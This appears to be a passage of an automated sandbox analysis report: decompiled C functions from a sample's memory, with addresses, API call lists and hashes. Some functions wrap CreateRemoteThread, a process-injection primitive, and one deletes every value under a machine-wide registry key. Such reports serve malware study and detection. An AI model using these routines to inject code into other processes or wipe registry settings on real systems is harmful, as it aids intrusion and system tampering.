  • Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
C-Code - Quality: 33%
			E00403020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}








0x00403026
0x0040302b
0x00403035
0x0040303b
0x00403043
0x00403045
0x0040304d
0x00403050
0x00403055
0x00403061
0x00403066
0x00403067
0x00403068
0x0040306e
0x0040306a
0x0040306a
0x0040306a
0x00403078
0x0040307e
0x0040307e
0x00403057
0x00403057
0x00403057
0x00403087
0x00403087
0x00403091

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
  • GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
  • CloseHandle.KERNEL32(?), ref: 00403087
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority
  • String ID:
  • API String ID: 1443725771-0
  • Opcode ID: cc963cedaaa8c141a90b6ba0a701b58c993f7297ed142496386f8b666d6d3d38
  • Instruction ID: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
  • Opcode Fuzzy Hash: B6E0DF84A25A4FC5C437E090203F77BA4207B0E9CADDC8521308F1AFA6BF08D406AB08
  • Instruction Fuzzy Hash: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
C-Code - Quality: 100%
			E001D1E99(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t26;
				void* _t29;
				void* _t33;
				void* _t41;

				_t41 = _a8;
				_t21 =  *(_t41 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t41 + 0x1b44) = _t21 | 0x00000001;
					_t26 = _a4;
					 *((intOrPtr*)(_t41 + 0x1b48)) = _t26;
					 *((intOrPtr*)(_t41 + 0x1b14)) =  *((intOrPtr*)(_t26 + 0x70));
					InitializeCriticalSection(_t41 + 0x1b18);
					 *((intOrPtr*)(_t41 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t29 = CreateEventA(0, 1, 0, 0);
					 *(_t41 + 0x1b10) = _t29;
					if( *((intOrPtr*)(_t41 + 0x1b40)) == 0 || _t29 == 0) {
						L6:
						E001D19F3(_t41);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t41 + 0x1b0c), _a16);
						} else {
							_t33 = CreateThread(0, 0, _a12, _t41, 0,  &_a8);
							 *(_t41 + 0x1b0c) = _t33;
							if(_t33 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return 0;
			}








0x001d1e9d
0x001d1ea0
0x001d1ea8
0x001d1eb0
0x001d1eb6
0x001d1ebd
0x001d1ecb
0x001d1ed1
0x001d1eeb
0x001d1ef1
0x001d1ef9
0x001d1eff
0x001d1f36
0x001d1f37
0x001d1f05
0x001d1f08
0x001d1f25
0x001d1f2e
0x001d1f0a
0x001d1f15
0x001d1f1d
0x001d1f23
0x00000000
0x00000000
0x00000000
0x00000000
0x001d1f23
0x001d1f08
0x001d1f3d
0x001d1f4b

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
  • SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E
    • Part of subcall function 001D19F3: EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
    • Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
    • Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
    • Part of subcall function 001D19F3: WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A58
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A68
    • Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A75
    • Part of subcall function 001D19F3: DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject
  • String ID:
  • API String ID: 1527658926-0
  • Opcode ID: 7410b3e9b634f2cff0a98ddadfc08129967f86c080f8268996739ca556ef27d6
  • Instruction ID: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
  • Opcode Fuzzy Hash: 6FC012804A5C0AB20527F0083D5D3060355AD112D146C7331715849542DF5CB269FF87
  • Instruction Fuzzy Hash: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
C-Code - Quality: 100%
			E001D1BAA(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E001D1722(E001D2165), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}







0x001d1baf
0x001d1bb6
0x001d1bdd
0x001d1be1
0x001d1be6
0x001d1bf1
0x001d1bf8
0x001d1bf8
0x001d1c03

APIs
  • GetStdHandle.KERNEL32(000000F4), ref: 001D1BB6
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 001D1BD7
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001D1BE6
  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 001D1BF1
  • CloseHandle.KERNEL32(00000000), ref: 001D1BF8
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: WaitForSingleObject$ReadFileResetEvent
  • String ID:
  • API String ID: 102907011-0
  • Opcode ID: 0299335ab9a3911fde22b8564450798ac63aade05c8ce35b27bba24940fd14d6
  • Instruction ID: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
  • Opcode Fuzzy Hash: F711368702CDCBF5C032FC00282A7AE5040ABCAAF5D5DD33662A525AC07F49E106B748
  • Instruction Fuzzy Hash: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
C-Code - Quality: 84%
			E001D17D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				long _t77;
				void* _t85;
				intOrPtr _t87;
				long _t89;
				void* _t93;
				void* _t95;
				long _t97;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_push(0x24);
				_push(0x1d1430);
				E001D1637(__ebx, __edi, __esi);
				 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
				_t114 =  *((intOrPtr*)(_t115 + 8));
				_t112 =  *((intOrPtr*)(_t114 + 0x1b48)) + 0x1bc8;
				 *(_t115 - 0x24) =  *(_t114 + 0x1b14);
				if(( *(_t114 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t112 + 0x1b40), 0xffffffff);
				}
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				while(( *(_t112 + 0x1b44) & 0x00000001) != 0 && ( *(_t114 + 0x1b44) & 0x00000001) != 0) {
					 *(_t115 - 0x20) =  *(_t115 - 0x20) + 1;
					_t70 =  *(_t115 - 0x20);
					if(_t70 == 0) {
						 *(_t115 - 0x30) = 0xd80;
						continue;
					}
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						__eflags =  *(_t115 - 0x30) - 0xd80;
						if( *(_t115 - 0x30) > 0xd80) {
							 *(_t115 - 0x30) = 0xd80;
						}
						_t72 =  *((intOrPtr*)(_t114 + 0x1b48));
						__eflags =  *((intOrPtr*)(_t72 + 0x6c)) - 3;
						if(__eflags != 0) {
							ResetEvent( *(_t114 + 0x1b40));
							_t77 = ReadFile( *(_t115 - 0x24), _t114 + 0xd8c,  *(_t115 - 0x30), _t115 - 0x1c, _t114 + 0x1b30);
							__eflags = _t77;
							if(_t77 == 0) {
								_push( *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c));
								_push(0xa);
								E001D3644( *(_t115 - 0x24), _t115 - 0x1c, _t114 + 0x1b30);
							}
						} else {
							_push(_t115 - 0x1c);
							_push( *(_t115 - 0x30));
							_t107 = _t114 + 0xd8c;
							_push(_t114 + 0xd8c);
							_push(_t72);
							E001D1F4E(0xd80, _t112, _t114, __eflags);
						}
						__eflags =  *(_t115 - 0x1c);
						if(__eflags == 0) {
							__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c);
							if(__eflags != 0) {
								E001D1672( *(_t115 - 0x24));
							}
						}
						continue;
					}
					_t85 = _t71 - 1;
					if(_t85 == 0) {
						_t87 = 0xd80 -  *((intOrPtr*)(_t114 + 8));
						 *((intOrPtr*)(_t115 - 0x28)) = _t87;
						__eflags =  *(_t115 - 0x1c) - _t87;
						if( *(_t115 - 0x1c) > _t87) {
							_t107 =  *(_t115 - 0x1c) - _t87;
							__eflags =  *(_t115 - 0x1c) - _t87;
							E001D176E(_t112,  *(_t115 - 0x1c) - _t87, _t114, 0,  *(_t115 - 0x1c) - _t87);
						}
						_t89 = E001D20DA(0xd80, _t107, _t114, _t114 + 0xd8c,  *(_t115 - 0x1c));
						__eflags = _t89;
						if(_t89 == 0) {
							E001D1672( *(_t115 - 0x24));
						}
						__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c) - 3;
						if(__eflags != 0) {
							L22:
							 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
						}
						continue;
					}
					_t93 = _t85 - 1;
					if(_t93 == 0) {
						WaitForSingleObject( *(_t112 + 0x1b10), 0xffffffff);
						continue;
					}
					_t95 = _t93 - 1;
					if(_t95 == 0) {
						_t97 = E001D176E(_t112, __eflags, _t112, _t112 + 0xd8c, 0xd80);
						 *(_t115 - 0x1c) = _t97;
						__eflags = _t97;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t126 = _t95 != 1;
					if(_t95 != 1) {
						continue;
					}
					E001D2F13(_t112, 2);
					_push( *(_t115 - 0x1c));
					_push(_t112 + 0xd8c);
					_push( *((intOrPtr*)(_t112 + 0x1b48)));
					if(E001D2046(0xd80, _t114, _t126) == 0) {
						E001D1672( *(_t115 - 0x24));
					}
					E001D2F13(_t112, 1);
					goto L22;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				__eflags = 0;
				return E001D173E(0);
			}
















0x001d17d0
0x001d17d2
0x001d17d7
0x001d17dc
0x001d17e0
0x001d17e9
0x001d17f5
0x001d17ff
0x001d1809
0x001d1809
0x001d180f
0x001d1818
0x001d1835
0x001d1838
0x001d183b
0x001d19a2
0x00000000
0x001d19a2
0x001d1841
0x001d1842
0x001d1905
0x001d1908
0x001d190a
0x001d190a
0x001d190d
0x001d1913
0x001d1917
0x001d1935
0x001d1953
0x001d1959
0x001d195b
0x001d1963
0x001d1966
0x001d1976
0x001d1976
0x001d1919
0x001d191c
0x001d191d
0x001d1920
0x001d1926
0x001d1927
0x001d1928
0x001d1928
0x001d197b
0x001d197f
0x001d198b
0x001d198f
0x001d1998
0x001d1998
0x001d198f
0x00000000
0x001d197f
0x001d1848
0x001d1849
0x001d18b7
0x001d18ba
0x001d18bd
0x001d18c0
0x001d18c5
0x001d18c5
0x001d18cb
0x001d18cb
0x001d18db
0x001d18e0
0x001d18e2
0x001d18e7
0x001d18e7
0x001d18f2
0x001d18f6
0x001d18fc
0x001d18fc
0x001d18fc
0x00000000
0x001d18f6
0x001d184b
0x001d184c
0x001d18aa
0x00000000
0x001d18aa
0x001d184e
0x001d184f
0x001d1890
0x001d1895
0x001d1898
0x001d189a
0x00000000
0x00000000
0x00000000
0x001d18a0
0x001d1851
0x001d1852
0x00000000
0x00000000
0x001d1857
0x001d185c
0x001d1865
0x001d1866
0x001d1873
0x001d1878
0x001d1878
0x001d1880
0x00000000
0x001d1880
0x001d19e5
0x001d19e9
0x001d19f0

APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D1809
    • Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
    • Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
    • Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C
    • Part of subcall function 001D2046: wsprintfA.USER32 ref: 001D2081
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D18AA
    • Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5
    • Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147
  • ResetEvent.KERNEL32(?), ref: 001D1935
  • ReadFile.KERNEL32(?,?,?,?,?), ref: 001D1953
    • Part of subcall function 001D3644: GetLastError.KERNEL32(?,?,001D197B,?,?,?,0000000A,00000003), ref: 001D3646
    • Part of subcall function 001D3644: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D3660
    • Part of subcall function 001D3644: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001D3671
    • Part of subcall function 001D1672: RaiseException.KERNEL32(00000003,00000000,00000001,?,001D1AB9,?,001D1A90,?,?,001D2102,?), ref: 001D167D
    • Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
    • Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,?), ref: 001D2009
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject
  • String ID:
  • API String ID: 2693620855-0
  • Opcode ID: 6e6f1deaef2e8bfaf0bbf284ef32ef05483bd122caecc3e4ef501d8e832f1d31
  • Instruction ID: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
  • Opcode Fuzzy Hash: BBF0A947480D4AF7D81B5931141CBBB7448B7CA3C18DCA65C30416752EAEDF325E9A5F
  • Instruction Fuzzy Hash: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
C-Code - Quality: 97%
			E001D1466(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t11;
				void* _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t25;
				void* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t39;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;

				_t45 =  *0x1d5000; // 0x0
				if(_t45 == 0) {
					L5:
					__eflags =  *0x1d5078; // 0x0
					if(__eflags != 0) {
						L11:
						_t12 = 0;
						L14:
						L15:
						return _t12;
					}
					E001D37B7(_t11, 0x1d508c,  *0x1d5074);
					__eflags =  *0x1d50c4; // 0x1
					if(__eflags == 0) {
						_t20 = E001D37D0(0x28, 0,  &_v8);
						_t33 =  *0x1d5074; // 0x0
						asm("sbb ecx, ecx");
						__eflags =  ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2;
						if( ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2 != 0) {
							 *0x1d50bc = 0;
						}
					}
					__eflags =  *0x1d50bc; // 0x0
					if(__eflags != 0) {
						L13:
						 *0x1d5080 = 0x1d508c;
						_t12 = CreateThread(0, 0, E001D36F3, 0, 0, 0x1d5088);
						 *0x1d5000 = _t12;
						goto L14;
					} else {
						 *0x1d5084 =  *0x1d5084 + 1;
						_t14 =  *0x1d5084; // 0x0
						__eflags = _t14 - _a4;
						if(_t14 < _a4) {
							_t16 = E001D37D0(0x28, 0,  &_v8);
							_t32 =  *0x1d5074; // 0x0
							 *_t32 =  *((intOrPtr*)(_t16 + 2));
							E001D37B7( *((intOrPtr*)(_t16 + 2)), 0x1d508c,  *0x1d5074);
							 *0x1d50c4 = 1;
							 *0x1d50bc = 1;
							goto L13;
						}
						goto L11;
					}
				}
				PostThreadMessageA( *0x1d5088, 0x12, 0, 0);
				WaitForSingleObject( *0x1d5000, 0x7530);
				CloseHandle( *0x1d5000);
				 *0x1d5000 = 0;
				_t25 = E001D37D0(0x1e, 0,  &_v8);
				_t46 =  *0x1d5049; // 0x0
				_t11 =  *_t25;
				if(_t46 != 0) {
					L3:
					if((_t11 & 0x00000004) == 0) {
						goto L5;
					}
					_t27 = E001D37D0(0x28, 0,  &_v8);
					_t39 =  *0x1d5074; // 0x0
					 *((char*)(_t27 + 2)) =  *_t39 - 1;
					_t12 = 0;
					goto L15;
				}
				_t47 =  *0x1d50bc; // 0x0
				if(_t47 == 0) {
					goto L5;
				}
				goto L3;
			}

















0x001d146d
0x001d1473
0x001d14ea
0x001d14ea
0x001d14f1
0x001d1549
0x001d1549
0x001d159d
0x001d159e
0x001d15a0
0x001d15a0
0x001d14ff
0x001d1504
0x001d150a
0x001d1513
0x001d1518
0x001d1525
0x001d1528
0x001d1529
0x001d152b
0x001d152b
0x001d1529
0x001d1531
0x001d1537
0x001d157e
0x001d158c
0x001d1592
0x001d1598
0x00000000
0x001d1539
0x001d1539
0x001d153f
0x001d1544
0x001d1547
0x001d1554
0x001d155c
0x001d1562
0x001d156b
0x001d1570
0x001d1577
0x00000000
0x001d1577
0x00000000
0x001d1547
0x001d1537
0x001d147f
0x001d1490
0x001d149c
0x001d14a9
0x001d14af
0x001d14b4
0x001d14ba
0x001d14bc
0x001d14c6
0x001d14c8
0x00000000
0x00000000
0x001d14d1
0x001d14d6
0x001d14e0
0x001d14e3
0x00000000
0x001d14e3
0x001d14be
0x001d14c4
0x00000000
0x00000000
0x00000000

APIs
  • PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
  • WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
  • CloseHandle.KERNEL32 ref: 001D149C
  • CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: dbc64af6430ca1c5886ade0b967d05941ebfb9057e984414971c4070ddfe475d
  • Instruction ID: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
  • Opcode Fuzzy Hash: FCF05C45404DB79BC52710821517B2E20D2AF46B8EC4233726635F6ECC0DD17008BF0D
  • Instruction Fuzzy Hash: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
C-Code - Quality: 59%
			E001D1F4E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t57;
				signed int _t61;
				intOrPtr _t63;
				void* _t64;

				_push(0x44);
				_push(0x1d1390);
				E001D1637(__ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t64 + 8));
				_t61 = 0;
				_t57 = 0;
				 *(_t64 - 4) = 0;
				while(1) {
					_push(0);
					_push(0);
					_push(_t64 - 0x20);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t64 - 0x20)) == 0) {
						break;
					}
					_t52 =  *((intOrPtr*)(_t64 + 0x10)) - _t61;
					 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					if(_t52 >  *((intOrPtr*)(_t64 - 0x20))) {
						_t52 =  *((intOrPtr*)(_t64 - 0x20));
						 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					}
					_push(_t64 - 0x1c);
					_push(_t52);
					_push( *((intOrPtr*)(_t64 + 0xc)) + _t61);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t64 - 0x1c)) != 0) {
						_t61 = _t61 +  *((intOrPtr*)(_t64 - 0x1c));
						 *(_t64 - 0x28) = _t61;
						continue;
					}
					break;
				}
				 *( *(_t64 + 0x14)) = _t61;
				if(_t61 != 0) {
					lstrcpyA(_t64 - 0x54, "TagId");
					 *((intOrPtr*)(_t64 - 0x1c)) = 0x28;
					_push(0);
					_push(_t64 - 0x1c);
					_push(_t64 - 0x54);
					_push(0xffff);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c88))() != 0) {
						lstrcpyA(_t63 + 0x3cb0, _t64 - 0x54);
					}
					_t57 = E001D1603( *((intOrPtr*)(_t64 + 0xc)), _t61);
					 *(_t64 - 0x2c) = _t57;
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				if(_t57 == 0) {
					 *(_t63 + 0x5c) =  *(_t63 + 0x5c) & 0x000000fb;
					 *( *(_t64 + 0x14)) =  *( *(_t64 + 0x14)) & _t57;
				}
				return E001D173E(_t57);
			}








0x001d1f4e
0x001d1f50
0x001d1f55
0x001d1f5a
0x001d1f5d
0x001d1f5f
0x001d1f61
0x001d1f64
0x001d1f64
0x001d1f66
0x001d1f6b
0x001d1f6c
0x001d1f7a
0x00000000
0x00000000
0x001d1f85
0x001d1f87
0x001d1f8d
0x001d1f8f
0x001d1f92
0x001d1f92
0x001d1f98
0x001d1f99
0x001d1f9f
0x001d1fa0
0x001d1fae
0x001d1fb6
0x001d1fb9
0x00000000
0x001d1fb9
0x00000000
0x001d1fae
0x001d1fc1
0x001d1fc5
0x001d1fd6
0x001d1fd8
0x001d1fdf
0x001d1fe4
0x001d1fe8
0x001d1fe9
0x001d1fee
0x001d1ffc
0x001d2009
0x001d2009
0x001d2014
0x001d2016
0x001d2016
0x001d2019
0x001d2031
0x001d2033
0x001d203a
0x001d203a
0x001d2043

APIs
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 3598368018-0
  • Opcode ID: 02c1a043345bfcf4915c21911e954b3d5073dba7e642fc22e378a39fa225183a
  • Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
  • Opcode Fuzzy Hash: 3BD0A900CE2DC9B876631047996CB73E2009F121CA98C378A32D90CB088B2E3038E341
  • Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
C-Code - Quality: 33%
			E001D3020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}








0x001d3026
0x001d302b
0x001d3035
0x001d303b
0x001d3043
0x001d3045
0x001d304d
0x001d3050
0x001d3055
0x001d3061
0x001d3066
0x001d3067
0x001d3068
0x001d306e
0x001d306a
0x001d306a
0x001d306a
0x001d3078
0x001d307e
0x001d307e
0x001d3057
0x001d3057
0x001d3057
0x001d3087
0x001d3087
0x001d3091

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
  • GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
  • CloseHandle.KERNEL32(?), ref: 001D3087
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx
  • String ID:
  • API String ID: 2802766549-0
  • Opcode ID: e8b56a8720ee6e3ece2d4dc4a7345ea2c28f84232851412fee7266dde94396d7
  • Instruction ID: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
  • Opcode Fuzzy Hash: 15D0A982DC09873A2B430048AA3D7E8E072FA502C08ACA3F234800AE568F4F3008CF52
  • Instruction Fuzzy Hash: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
C-Code - Quality: 100%
			E001D35DB() {
				void* _v8;
				int _v12;
				char _v44;
				long _t10;
				int _t18;

				_t10 = RegOpenKeyExA(0x80000002,  *0x1d5004, 0, 0xf003f,  &_v8);
				if(_t10 == 0) {
					_t18 = 0x20;
					while(1) {
						_v12 = _t18;
						if(RegEnumValueA(_v8, 0,  &_v44,  &_v12, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v8,  &_v44);
					}
					return RegCloseKey(_v8);
				}
				return _t10;
			}








0x001d35f9
0x001d3601
0x001d360d
0x001d361d
0x001d362d
0x001d3634
0x00000000
0x00000000
0x001d3617
0x001d3617
0x00000000
0x001d3640
0x001d3643

APIs
  • RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
  • RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
  • RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject
  • String ID:
  • API String ID: 1487171737-0
  • Opcode ID: 113accf1a247a85ca4628c88750f0cdfece1ea245e894959ebf4d1c2d30c192f
